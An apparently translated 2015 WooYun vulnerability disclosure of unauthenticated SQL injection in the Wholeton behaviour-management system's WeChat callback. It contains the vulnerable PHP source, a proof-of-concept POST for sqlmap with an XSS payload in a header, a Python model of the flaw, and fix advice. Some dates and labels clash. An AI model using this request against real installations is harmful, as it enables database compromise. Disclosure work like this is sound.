
Vulnerability summary

Defect ID: WooYun-2015-103638

Title: Wholeton Internet Behavior Management System (惠尔顿上网行为管理系统) XML entity injection (no login required)

Related vendor: cncert国家互联网应急中心 (CNCERT, National Internet Emergency Center)

Author: xfkxfk (certified white hat)

Submitted: 2015-03-27 17:23

Published: 2015-06-25 16:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organisation (cncert国家互联网应急中心) for handling

Source: http://www.wooyun.org; for questions or help contact help@wooyun.org

Tags: sql injection, php source code audit, php source code analysis



Vulnerability details

Disclosure status:

2015-03-27: details sent to the vendor, awaiting vendor handling
2015-03-27: vendor confirmed; details disclosed to the vendor only
2015-03-30: details opened to third-party security partners (绿盟科技唐朝安全巡航无声信息
2015-05-21: details opened to core white hats and domain experts
2015-05-31: details opened to regular white hats
2015-06-10: details opened to intern white hats
2015-06-25: details opened to the public

Brief description:

Wholeton Internet Behavior Management System XML entity injection (no login required)

Detailed description:

Wholeton Internet Behavior Management System XML entity injection (no login required)

Showcase customers listed on the vendor's site: http://**.**.**.**/Anli.php

Some real-world instances reachable from the Internet:

code area
1.https://**.**.**.**
2.https://**.**.**.**/
3.**.**.**.**
4.**.**.**.**
5.**.**.**.**/
6.http://**.**.**.**/





This is a generic XML entity injection problem in the product.

It was analysed before: http://**.**.**.**/bugs/wooyun-2010-075009

The same WeChat callback interface is reused here, so the same problem recurs. This instance has no file read, but the values the handler parses out of the posted XML flow unescaped into several SQL statements, so it results in multiple SQL injections.



File: /base/wechat_interface.php

code area
<?php
/**
 * wechat php test
 */

//define your token
$thisfile = basename($_SERVER['PHP_SELF']);
$RootDir = $_SERVER["DOCUMENT_ROOT"].'/base';
include_once "$RootDir/include/database.php";

define("TOKEN", "wholeton");   // the same constant in every install of the product

$wechatObj = new wechatCallbackapiTest();

// No echostr parameter: the request goes straight to responseMsg().
// checkSignature() is only reached through valid(), so the message path is unauthenticated.
if (!isset($_GET["echostr"])){
    $wechatObj->responseMsg();
}else{
    $wechatObj->valid();
}

exit;

class wechatCallbackapiTest
{
    public function valid()
    {
        $echoStr = $_GET["echostr"];

        //valid signature , option
        if($this->checkSignature()){
            echo $echoStr;
        }
    }

    public function responseMsg()
    {
        //get post data, May be due to the different environments
        $postStr = $GLOBALS["HTTP_RAW_POST_DATA"];   // raw body of the unauthenticated POST

        //extract post data
        if (!empty($postStr)){

            //$fw = fopen("/usr/local/WholetonTM/htdocs/wx.txt", "w");

            // every element value read below is attacker-controlled
            $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
            $fromUsername = $postObj->FromUserName;
            $toUsername = $postObj->ToUserName;
            $event = trim($postObj->Event);
            $EventKey = trim($postObj->EventKey);

            // $g_str .= "fromUsername: ".$fromUsername."\n";
            // $g_str .= "toUsername: ".$toUsername."\n";
            // $g_str .= "event: ".$event."\n";
            // $g_str .= "EventKey: ".str_replace("qrscene_","",$EventKey)."\n";

            //fwrite($fw, $g_str);

            switch ($event) {
                case 'subscribe':
                    $focus = 1;
                    $scene_id = str_replace("qrscene_","",$EventKey);
                    break;
                case 'unsubscribe':
                    $focus = 0;
                    break;
                case 'SCAN':
                    $focus = 1;
                    $scene_id = $postObj->EventKey;
                    break;
            }
            //fwrite($fw, "focus:".$focus."\n");
            global $gblDBConnect;
            // sink 1: $toUsername spliced into a quoted string context
            $sql_policy_info = "select id from tb_wechat_promote_policy where original_id='$toUsername'";

            //fwrite($fw, "sql_policy_info:".$sql_policy_info."\n");

            $data_policy_info= $gblDBConnect->getOne($sql_policy_info);

            // sink 2: $fromUsername spliced in (quoted); the policy id comes from the previous query
            $sql_user_obj = "select count(*) as num, id, mac_list from tb_wechat_user_obj where promote_policy_id=".$data_policy_info->id." and wechat_id='$fromUsername'";
            $data_user_obj = $gblDBConnect->getOne($sql_user_obj);

            //fwrite($fw, "sql_user_obj:".$sql_user_obj."\n");

            $sql_edit_mac = "";
            if($focus==1){
                // sink 3: $scene_id (derived from EventKey) spliced in unquoted, so no quote is needed to break out
                $sql_mac = "select mac from tb_wechat_mac_scene where scene_id=".$scene_id;
                //fwrite($fw, "sql_mac:".$sql_mac."\n");
                $data_mac = $gblDBConnect->getOne($sql_mac);
                $mac = $data_mac->mac;
                if ($data_user_obj->mac_list!="") {
                    $mac_list_ary = explode(",,",$data_user_obj->mac_list);
                    //fwrite($fw, "mac_list:".$ata_user_obj->mac_list."\n");
                    if (is_array($mac_list_ary)) {
                        if (!in_array($mac, $mac_list_ary)) {
                            //fwrite($fw, " not in_array:".$mac."\n");
                            $mac_list_ary[] = $mac;
                            $mac_str = implode(",,", $mac_list_ary);

                            $sql_edit_mac = "mac_list='$mac_str', ";
                        }
                    }
                }else {
                    //fwrite($fw, " not = mac_list:".$mac."\n");
                    $sql_edit_mac = "mac_list='$mac', ";
                }
            }
            //fwrite($fw, "num".$data_user_obj->num."\n");
            if($data_user_obj->num==0){
                // sink 4: $fromUsername again, in the insert
                $sql_add = "insert into tb_wechat_user_obj(promote_policy_id, wechat_id, mac_list, focus) values($data_policy_info->id, '$fromUsername', '$mac', $focus)";
                //fwrite($fw, "sql_add:".$sql_add."\n");
                $gblDBConnect->execute($sql_add);
            }else{
                $sql_edit = "update tb_wechat_user_obj set ".$sql_edit_mac."focus=$focus where id=".$data_user_obj->id;
                //fwrite($fw, "sql_edit:".$sql_edit."\n");
                $gblDBConnect->execute($sql_edit);
            }
            exec('/usr/local/WholetonTM/triton/bin/TritonIPCTools -R');
            //fwrite($fw, $g_str);
            //fclose($fw);

        }else {
            //$g_str .= "exit in valid()\n";
            exit;
        }
    }
    private function receiveEvent($object){
        $content = "";

        switch ($object->Event) {
            case 'subscribe':
                $content = (!empty($object->EventKey))?("\n来自二维码场景 ".str_replace("qrscene_","",$object->EventKey)):"";
                break;
            case 'unsubscribe':
                $content = "取消关注";
                break;
            case 'SCAN':
                $content = "扫描场景". $object->EventKey;
                break;
        }
        $fw = fopen("/usr/local/WholetonTM/htdocs/wx1.txt", "w");
        fwrite($fw, ($object->Event)."\nEventKey:".($object->EventKey)."\n".$content);
        fclose($fw);
        return $content;
    }
    private function checkSignature()
    {
        $signature = $_GET["signature"];
        $timestamp = $_GET["timestamp"];
        $nonce = $_GET["nonce"];

        // sha1 over the sorted (token, timestamp, nonce) triple, compared with a loose ==
        $token = TOKEN;
        $tmpArr = array($token, $timestamp, $nonce);
        sort($tmpArr, SORT_STRING);
        $tmpStr = implode( $tmpArr );
        $tmpStr = sha1( $tmpStr );

        if( $tmpStr == $signature ){
            return true;
        }else{
            return false;
        }
    }
}

?>



When the echostr GET parameter is absent, responseMsg() is called directly and checkSignature() is never evaluated, so the message-handling path requires no authentication at all.
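The dispatch logic and the signature algorithm, modelled in Python as an added example (not code from the report or from the product): dispatch_original() mirrors the shipped control flow, in which the signature is only consulted on the echostr branch, and dispatch_fixed() applies the check to every request before either branch runs. Query parameters are passed as a dict; the timestamp and nonce values used in the test are made up, and the function names are my own. One caveat: because TOKEN is a constant in the shipped file, even the fixed dispatch only proves the sender knows a value shared by every install, so a real deployment would also need a per-install token.

```python
import hashlib
import hmac

TOKEN = "wholeton"  # the constant hard-coded in the shipped wechat_interface.php


def wechat_signature(token: str, timestamp: str, nonce: str) -> str:
    """checkSignature()'s algorithm: sort the three strings, join, SHA-1 hex digest."""
    return hashlib.sha1("".join(sorted([token, timestamp, nonce])).encode()).hexdigest()


def signed_query(timestamp: str, nonce: str) -> dict:
    """Build the query parameters a legitimate (token-holding) caller would send."""
    return {"timestamp": timestamp, "nonce": nonce,
            "signature": wechat_signature(TOKEN, timestamp, nonce)}


def _signature_ok(query: dict) -> bool:
    expected = wechat_signature(TOKEN, query.get("timestamp", ""), query.get("nonce", ""))
    # constant-time compare instead of PHP's loose ==
    return hmac.compare_digest(expected.encode(), query.get("signature", "").encode())


def dispatch_original(query: dict) -> str:
    """Control flow of the shipped file; returns the name of the handler that runs."""
    if "echostr" not in query:
        return "responseMsg"          # message path: no signature check at all
    return "echo" if _signature_ok(query) else "reject"


def dispatch_fixed(query: dict) -> str:
    """Hardened dispatch: verify the signature first, on every request."""
    if not _signature_ok(query):
        return "reject"
    return "echo" if "echostr" in query else "responseMsg"


if __name__ == "__main__":
    print("original, no params :", dispatch_original({}))           # responseMsg
    print("fixed, no params    :", dispatch_fixed({}))              # reject
    print("fixed, signed       :", dispatch_fixed(signed_query("1427448000", "abc")))
```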

It then reads the raw request body: $postStr = $GLOBALS["HTTP_RAW_POST_DATA"];

The values parsed out of that XML go straight into SQL statements.

Of the four values read from the XML ($fromUsername, $toUsername, $event, $EventKey), three reach SQL by plain string concatenation: $toUsername in $sql_policy_info, $fromUsername in $sql_user_obj and $sql_add, and $EventKey (as $scene_id) in $sql_mac, where it is not even quoted. $event itself is only the switch selector, but it chooses the path: it must be subscribe or SCAN for the $scene_id query to run. None of the values is escaped or bound.

Proof of concept:

Save the following request as 111.txt:

code area
POST /base/wechat_interface.php HTTP/1.1
Host: https://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Forwarded-For: <img src=1 onerror=alert(1)>**.**.**.**
Connection: keep-alive
Content-Type: text/xml
Content-Length: 179

<?xml version="1.0" encoding="utf-8"?>
<xml>
<ToUserName>111111*</ToUserName>
<FromUserName>222222</FromUserName>
<EventKey>333333</EventKey>
<Event>subscribe</Event>
</xml>



Then run it through sqlmap (the * after 111111 in ToUserName is sqlmap's injection-point marker for a request loaded with -r).

Screenshots: 1.png, 2.png

Fix:

This system could just be rewritten... At a minimum: verify the signature on every request, not only when echostr is present, and pass the XML-derived values ($toUsername, $fromUsername, $scene_id) to the database as bound parameters instead of concatenating them into the query strings, with $scene_id additionally checked to be an integer.

Copyright notice: please credit xfkxfk@乌云 (WooYun) when reposting.


Vendor response

Vendor reply:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-03-27 16:44

Vendor comment:

CNVD has notified the site's operating unit (the software vendor) through the publicly listed contact (or a previously established handling channel).

Latest status:

None yet


Comments:

  1. 2015-03-25 17:27 | Ton7BrEak ( regular white hat | Rank:292 vulns:64 | I'll keep working hard!)
    0

    @水晶 take a look at xml~

  2. 2015-03-25 17:34 | 屎蛋 ( passer-by | Rank:8 vulns:2 | boom)
    0

    m

  3. 2015-03-26 07:33 | 明月影 ( passer-by | Rank:12 vulns:8 )
    0

    This isn't common.

  4. 2015-03-26 10:50 | 水晶 ( intern white hat | Rank:58 vulns:22 | loves life, likes the Internet)
    0

    @Ton7BrEak ok
